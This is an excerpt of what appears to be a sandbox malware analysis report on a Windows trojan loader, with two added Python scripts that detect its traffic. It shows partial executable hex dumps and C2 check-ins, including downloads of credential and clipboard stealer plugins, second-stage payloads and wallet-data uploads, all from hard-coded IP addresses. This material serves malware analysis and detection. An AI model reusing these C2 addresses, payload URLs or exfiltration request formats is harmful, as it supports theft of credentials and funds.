00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 59 58 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 2b 00 00 00 50 14 00 00 0c 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 14 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 90 14 00 00 02 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6c 7a 6e 64 67 7a 71 00 30 19 00 00 60 3f 00 00 26 19 00 00 5e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6d 6e 6b 6e 69 66 6c 00 10 00 00 00 90 58 00 00 04 00 00 00 84 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:19 GMTContent-Type: application/octet-streamContent-Length: 1876480Last-Modified: Sat, 13 Apr 2024 16:50:51 GMTConnection: keep-aliveETag: "661ab7eb-1ca200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2a 52 e4 13 6e 33 8a 40 6e 33 8a 40 6e 33 8a 40 35 5b 89 41 60 33 8a 40 35 5b 8f 41 f0 33 8a 40 bb 5e 8e 41 7c 33 8a 40 bb 5e 89 41 7a 33 8a 40 bb 5e 8f 41 1b 33 8a 40 35 5b 8e 41 7a 33 8a 40 35 5b 8b 41 7d 33 8a 40 6e 33 8b 40 ba 33 8a 40 f5 5d 83 41 6f 33 8a 40 f5 5d 75 40 6f 33 8a 40 f5 5d 88 41 6f 33 8a 40 52 69 63 68 6e 33 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 b2 bf 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 aa 01 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4a 00 00 04 00 00 78 24 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 06 00 6a 00 00 00 00 60 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 6d 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 6d 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
60 06 00 00 02 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 72 68 77 6d 63 6d 6c 00 b0 19 00 00 c0 30 00 00 b0 19 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 74 69 77 74 79 64 00 10 00 00 00 70 4a 00 00 06 00 00 00 9c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 13 Apr 2024 18:21:26 GMT Content-Type: application/octet-stream Content-Length: 1050444 Last-Modified: Sat, 13 Apr 2024 18:20:05 GMT Connection: keep-alive ETag: "661accd5-10074c" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 13 Apr 2024 18:22:06 GMT Content-Type: application/octet-stream Content-Length: 1793536 Last-Modified: Sat, 06 Apr 2024 12:58:33 GMT Connection: keep-alive ETag: "661146f9-1b5e00" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1 Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1 Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1 Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000042001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1 Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYxMA== Host: 193.233.132.56 Content-Length: 4770 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 34 33 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000043031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1 Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000049001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1 Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 30 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000051001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /lend/alexxxxxxxx.exe HTTP/1.1 | Host: 193.233.132.167
Source: Joe Sandbox View IP Address: 34.117.186.192
Source: Joe Sandbox View IP Address: 147.45.47.93
Source: Joe Sandbox View IP Address: 172.67.75.166
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: ipinfo.io (listed 4 times)
Source: global traffic HTTP traffic detected (listed 7 times, alternating with the db-ip.com request below): GET /widget/demo/81.181.54.60 HTTP/1.1 | Connection: Keep-Alive | Referer: https://ipinfo.io/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: ipinfo.io
Source: global traffic HTTP traffic detected (listed 7 times): GET /demo/home.php?s=81.181.54.60 HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: db-ip.com
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56 (listed 49 times)
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.167 (listed once)
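The entries above come from a simple correlation: a destination address that no DNS answer in the capture ever produced was reached from a hard-coded value, which for this sample matches the C2 and payload servers. Added example, not part of the Joe Sandbox report: the check in Python over constructed DNS-answer and connection events. The answer addresses assigned to ipinfo.io and db-ip.com below are assumptions made for the example and are not stated anywhere in the report; the private-range skip list and the output wording are also this example's own.

```python
# Added example (not Joe Sandbox's code): flag TCP destinations that no DNS
# answer in the same capture returned, i.e. addresses the sample had hard-coded.
from collections import Counter
from ipaddress import ip_address, ip_network

# Constructed DNS answers (name -> addresses). The address mapping is an
# assumption for this example; the report only lists the names queried.
DNS_ANSWERS = [
    ("ipinfo.io", ["34.117.186.192"]),
    ("db-ip.com", ["172.67.75.166"]),
]

# Constructed TCP connection events (destination ip, destination port).
# The repeats to 193.233.132.56 stand in for the report's many entries.
CONNECTIONS = [
    ("34.117.186.192", 443),
    ("172.67.75.166", 443),
    ("193.233.132.56", 80),
    ("193.233.132.56", 80),
    ("193.233.132.167", 80),
    ("193.233.132.56", 80),
    ("10.0.0.1", 53),          # resolver / internal host: reached without a lookup
]

# Destinations that are normally contacted without any DNS resolution.
SKIP_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
             ip_network("192.168.0.0/16"), ip_network("127.0.0.0/8")]


def resolved_addresses(dns_answers) -> set:
    """Every address that any DNS answer in the capture returned."""
    return {ip for _name, ips in dns_answers for ip in ips}


def is_skipped(ip: str) -> bool:
    """True for private / loopback destinations, which never need a lookup."""
    addr = ip_address(ip)
    return any(addr in net for net in SKIP_NETS)


def unresolved_destinations(connections, dns_answers) -> dict:
    """Public destination IPs that no DNS answer produced, with their
    connection counts. This is the logic behind the report's
    'TCP traffic detected without corresponding DNS query' entries."""
    known = resolved_addresses(dns_answers)
    counts = Counter()
    for ip, _port in connections:
        if ip in known or is_skipped(ip):
            continue
        counts[ip] += 1
    return dict(counts)


def report(connections, dns_answers) -> list:
    """Lines in the report's own style, most-contacted destination first."""
    counts = unresolved_destinations(connections, dns_answers)
    return [f"TCP traffic without corresponding DNS query: {ip} (connections: {n})"
            for ip, n in sorted(counts.items(), key=lambda kv: -kv[1])]


if __name__ == "__main__":
    for line in report(CONNECTIONS, DNS_ANSWERS):
        print(line)
```

Two caveats when applying this outside a sandbox: a resolution cached before the capture started looks identical to a hard-coded address, so the check is a lead rather than proof on its own, and the report corroborates it here with its separate "C2 URLs / IPs found in malware configuration" signature; and a resolver answer for one name can legitimately serve connections to several services behind a CDN, which is why the correlation is done on addresses, not names.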
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B0D8D0 recv,recv,recv,recv, 0_2_00B0D8D0
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1 | Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1 | Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1 | Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1 | Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1 | Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /lend/alexxxxxxxx.exe HTTP/1.1 | Host: 193.233.132.167
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: unknown HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 193.233.132.56 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
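The HTTP entries in this section fall into three recognisable groups: headerless POSTs to /Pneh2sXQk0/index.php on a bare IP whose 4-byte body is st=s or whose body is r= followed by a hex blob, headerless GETs of .exe and .dll payloads from the same two bare IPs, and browser-looking GETs to ipinfo.io and db-ip.com that look up the victim's public address. Added example, not Joe Sandbox's code: a Python parser for the "HTTP traffic detected" lines as they appear on this page (headers run together, or separated by " | ") and a classifier that tags those groups. The tag names, the header list and the sample lines (copied from this report, with one hex dump abbreviated) are this example's own.

```python
# Added example (not Joe Sandbox's code): parse this report's "HTTP traffic
# detected" lines and tag the C2, payload-download and IP-lookup patterns.
import re
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address

# Header names that occur in the report's lines. The line breaks between
# headers were lost in extraction, so we split on the names instead.
HEADER_NAMES = ("Content-Type", "Content-Length", "Cache-Control",
                "Connection", "Referer", "User-Agent", "Host")
HEADER_SPLIT = re.compile(r"(" + "|".join(HEADER_NAMES) + r"): ")
REQUEST_LINE = re.compile(r"\b(GET|POST) (\S+) HTTP/1\.[01](.*)$")
HEX_DUMP = re.compile(r"Data Raw: (?:[0-9a-fA-F]{2} ?)+")


@dataclass
class HttpRequest:
    method: str
    path: str
    host: str
    headers: dict
    body: str


def parse_report_line(line: str) -> HttpRequest:
    """Turn one run-together (or ' | '-separated) report line into a request."""
    m = REQUEST_LINE.search(line)
    if not m:
        raise ValueError(f"not an HTTP request line: {line[:40]!r}")
    method, path, rest = m.groups()
    body = ""
    if "Data Ascii: " in rest:
        rest, body = rest.split("Data Ascii: ", 1)
    rest = HEX_DUMP.sub("", rest)            # the hex dump duplicates the ASCII body
    parts = HEADER_SPLIT.split(rest)         # ['', name1, value1, name2, value2, ...]
    headers = {n: v.strip(" |") for n, v in zip(parts[1::2], parts[2::2])}
    return HttpRequest(method, path, headers.get("Host", ""), headers, body.strip())


def is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare address, i.e. no DNS was needed."""
    try:
        ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def classify(req: HttpRequest) -> list:
    """Indicator tags for one request, in a fixed order (names are this example's)."""
    tags = []
    ip_host = is_ip_literal(req.host)
    if ip_host:
        tags.append("ip-literal-host")
    if req.method == "POST" and req.path.endswith("/index.php") and ip_host:
        if req.body == "st=s":                          # 4-byte check-in seen in the report
            tags.append("c2-checkin")
        elif re.fullmatch(r"r=[0-9A-Fa-f]+", req.body):  # hex blob after 'r='
            tags.append("c2-encoded-report")
    if req.method == "GET" and ip_host and re.search(r"\.(exe|dll)$", req.path, re.I):
        tags.append("payload-download")                  # second stages and plugin DLLs
    if req.host in ("ipinfo.io", "db-ip.com"):
        tags.append("ip-geolocation-lookup")             # victim's public IP / location
    if "User-Agent" not in req.headers:
        tags.append("no-user-agent")                     # not a browser: raw HTTP client
    return tags


def summarize(lines) -> dict:
    """Count how often each tag applies across the given report lines."""
    counts = Counter()
    for line in lines:
        counts.update(classify(parse_report_line(line)))
    return dict(counts)


# Sample lines copied from this report (constructed test input; the second
# line's hex dump is abbreviated, its ASCII body is the full value).
SAMPLE_LINES = [
    "Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s",
    "Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 193.233.132.56 | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09",
    "Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56",
    "Source: global traffic HTTP traffic detected: GET /lend/alexxxxxxxx.exe HTTP/1.1 | Host: 193.233.132.167",
    "Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.54.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io",
    "Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.54.60 HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: db-ip.com",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        req = parse_report_line(line)
        print(req.method, req.host, req.path, classify(req))
    print(summarize(SAMPLE_LINES))
```

The split-on-header-name trick only works because the report's header set is small and fixed; on raw pcap data you would parse the request properly and the classifier alone is what carries over. Note that the C2 POSTs and payload GETs send no User-Agent at all, while the ipinfo.io and db-ip.com lookups carry a full Chrome string, so "no User-Agent to a bare IP" separates the two even before looking at the body.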
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/random.exe
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/sarra.exe
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/amert.exe
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/amert.exeQ
Source: explorha.exe, 00000006.00000002.2908237175.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000003.2572249094.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe
Source: explorha.exe, 00000006.00000003.2572249094.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe5e67ee
Source: explorha.exe, 00000006.00000003.2572249094.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exe5e67ee8
Source: explorha.exe, 00000006.00000002.2908237175.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000003.2572249094.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exeo
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/mine/random.exeu
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllB
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllh
Source: explorha.exe, 00000006.00000002.2904871906.0000000000A96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2450226998.000002E1743B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.2892509768.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php1Y
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php51001
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176250000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2450226998.000002E174328000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176286000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1%r0
Source: rundll32.exe, 00000008.00000002.2450226998.000002E174328000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1;BU)(A;OICI;GXGR;;;WD)AY
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1=1
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176286000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1Trg
Source: rundll32.exe, 00000008.00000002.2450226998.000002E1743E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1a
Source: rundll32.exe, 00000008.00000002.2450583634.000002E176250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1heH
Source: explorha.exe, 00000006.00000002.2904871906.0000000000A96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpF
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpIY
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpUsers
Source: explorha.exe, 00000006.00000002.2908237175.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpded
Source: rundll32.exe, 0000000D.00000002.2892509768.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpl
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpll32.dll
Source: explorha.exe, 00000006.00000002.2904871906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpmb3JtLXVybGVuY29kZWQ=
Source: explorha.exe, 00000006.00000002.2908237175.0000000000B11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpoded
Source: rundll32.exe, 00000008.00000002.2450226998.000002E1743B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpq8
Source: powershell.exe, 0000000B.00000002.2432332718.00000246D4E79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2414037299.00000246C66E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C4E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2414037299.00000246C5038000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: ad0e9cf6d6.exe, 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, ad0e9cf6d6.exe, 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 